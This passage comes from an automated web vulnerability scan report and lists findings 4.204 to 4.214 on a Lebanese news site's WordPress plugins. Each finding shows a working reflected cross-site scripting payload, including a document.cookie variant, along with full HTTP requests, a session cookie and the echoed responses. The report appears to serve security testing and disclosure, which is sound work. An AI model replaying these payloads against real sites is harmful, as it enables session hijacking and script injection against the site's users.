Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:09:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:10:01 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:10:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-contentc399a\"><script>alert(1)</script>9ef6eff5d83/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.204. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc71c"><script>alert(1)</script>517800f4c48 was submitted in the REST URL parameter 2. This input was echoed as cc71c\"><script>alert(1)</script>517800f4c48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginscc71c"><script>alert(1)</script>517800f4c48/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:11:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:11:06 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:11:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/pluginscc71c\"><script>alert(1)</script>517800f4c48/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.205. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70f33"><script>alert(1)</script>bc17fb5e154 was submitted in the REST URL parameter 3. This input was echoed as 70f33\"><script>alert(1)</script>bc17fb5e154 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/cool-ryan-easy-popups70f33"><script>alert(1)</script>bc17fb5e154/lib/js/jquery-ui-effects.js?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:11 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:11 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/cool-ryan-easy-popups70f33\"><script>alert(1)</script>bc17fb5e154/lib/js/jquery-ui-effects.js?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.206. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce178"><script>alert(1)</script>a0d1146d619 was submitted in the REST URL parameter 4. This input was echoed as ce178\"><script>alert(1)</script>a0d1146d619 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/cool-ryan-easy-popups/libce178"><script>alert(1)</script>a0d1146d619/js/jquery-ui-effects.js?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:13:46 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:13:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/cool-ryan-easy-popups/libce178\"><script>alert(1)</script>a0d1146d619/js/jquery-ui-effects.js?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.207. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8b1c"><script>alert(1)</script>de42c732ebf was submitted in the REST URL parameter 5. This input was echoed as c8b1c\"><script>alert(1)</script>de42c732ebf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/cool-ryan-easy-popups/lib/jsc8b1c"><script>alert(1)</script>de42c732ebf/jquery-ui-effects.js?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:17 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:30 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/cool-ryan-easy-popups/lib/jsc8b1c\"><script>alert(1)</script>de42c732ebf/jquery-ui-effects.js?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.208. http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6f74"><script>alert(1)</script>1b4497e2e22 was submitted in the REST URL parameter 6. This input was echoed as b6f74\"><script>alert(1)</script>1b4497e2e22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.jsb6f74"><script>alert(1)</script>1b4497e2e22?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:17:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:17:14 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:17:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.jsb6f74\"><script>alert(1)</script>1b4497e2e22?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.209. http://starscene.dailystar.com.lb/wp-content/plugins/dd-formmailer/dd-formmailer.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/dd-formmailer/dd-formmailer.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1da61"><script>alert(1)</script>e7e997dd165 was submitted in the REST URL parameter 1. This input was echoed as 1da61\"><script>alert(1)</script>e7e997dd165 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content1da61"><script>alert(1)</script>e7e997dd165/plugins/dd-formmailer/dd-formmailer.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:39 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content1da61\"><script>alert(1)</script>e7e997dd165/plugins/dd-formmailer/dd-formmailer.css'; }); return true;" >
...[SNIP]...

4.210. http://starscene.dailystar.com.lb/wp-content/plugins/dd-formmailer/dd-formmailer.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/dd-formmailer/dd-formmailer.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a69a"><script>alert(1)</script>d0caedefa3d was submitted in the REST URL parameter 2. This input was echoed as 4a69a\"><script>alert(1)</script>d0caedefa3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins4a69a"><script>alert(1)</script>d0caedefa3d/dd-formmailer/dd-formmailer.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:14:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:14:19 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:14:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins4a69a\"><script>alert(1)</script>d0caedefa3d/dd-formmailer/dd-formmailer.css'; }); return true;" >
...[SNIP]...

4.211. http://starscene.dailystar.com.lb/wp-content/plugins/dd-formmailer/dd-formmailer.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/dd-formmailer/dd-formmailer.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1cd7"><script>alert(1)</script>395a570d334 was submitted in the REST URL parameter 3. This input was echoed as d1cd7\"><script>alert(1)</script>395a570d334 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/dd-formmailerd1cd7"><script>alert(1)</script>395a570d334/dd-formmailer.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:52 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:16:02 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:16:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/dd-formmailerd1cd7\"><script>alert(1)</script>395a570d334/dd-formmailer.css'; }); return true;" >
...[SNIP]...

4.212. http://starscene.dailystar.com.lb/wp-content/plugins/dd-formmailer/dd-formmailer.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/dd-formmailer/dd-formmailer.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd360"><script>alert(1)</script>89ea21377c7 was submitted in the REST URL parameter 4. This input was echoed as fd360\"><script>alert(1)</script>89ea21377c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/dd-formmailer/dd-formmailer.cssfd360"><script>alert(1)</script>89ea21377c7 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:17:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:17:33 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:17:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/dd-formmailer/dd-formmailer.cssfd360\"><script>alert(1)</script>89ea21377c7'; }); return true;" >
...[SNIP]...

4.213. http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/fbconnect.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/fbconnect/fbconnect.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9fce"><script>alert(1)</script>061b055854c was submitted in the REST URL parameter 1. This input was echoed as d9fce\"><script>alert(1)</script>061b055854c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentd9fce"><script>alert(1)</script>061b055854c/plugins/fbconnect/fbconnect.css?ver=svn-62 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=483cc57eb4148851796f562cc4b67ebe
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:56 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-contentd9fce\"><script>alert(1)</script>061b055854c/plugins/fbconnect/fbconnect.css?ver=svn-62'; }); return true;" >
...[SNIP]...

4.214. http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/fbconnect.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/fbconnect/fbconnect.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b64b0"><script>alert(1)</script>ace49c136b8 was submitted in the REST URL parameter 2. This input was echoed as b64b0\"><script>alert(1)</script>ace49c136b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsb64b0"><script>alert(1)</script>ace49c136b8/fbconnect/fbconnect.css?ver=svn-62 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:14:38 GMT
Server: Apache/2.2.14 (Ubuntu)
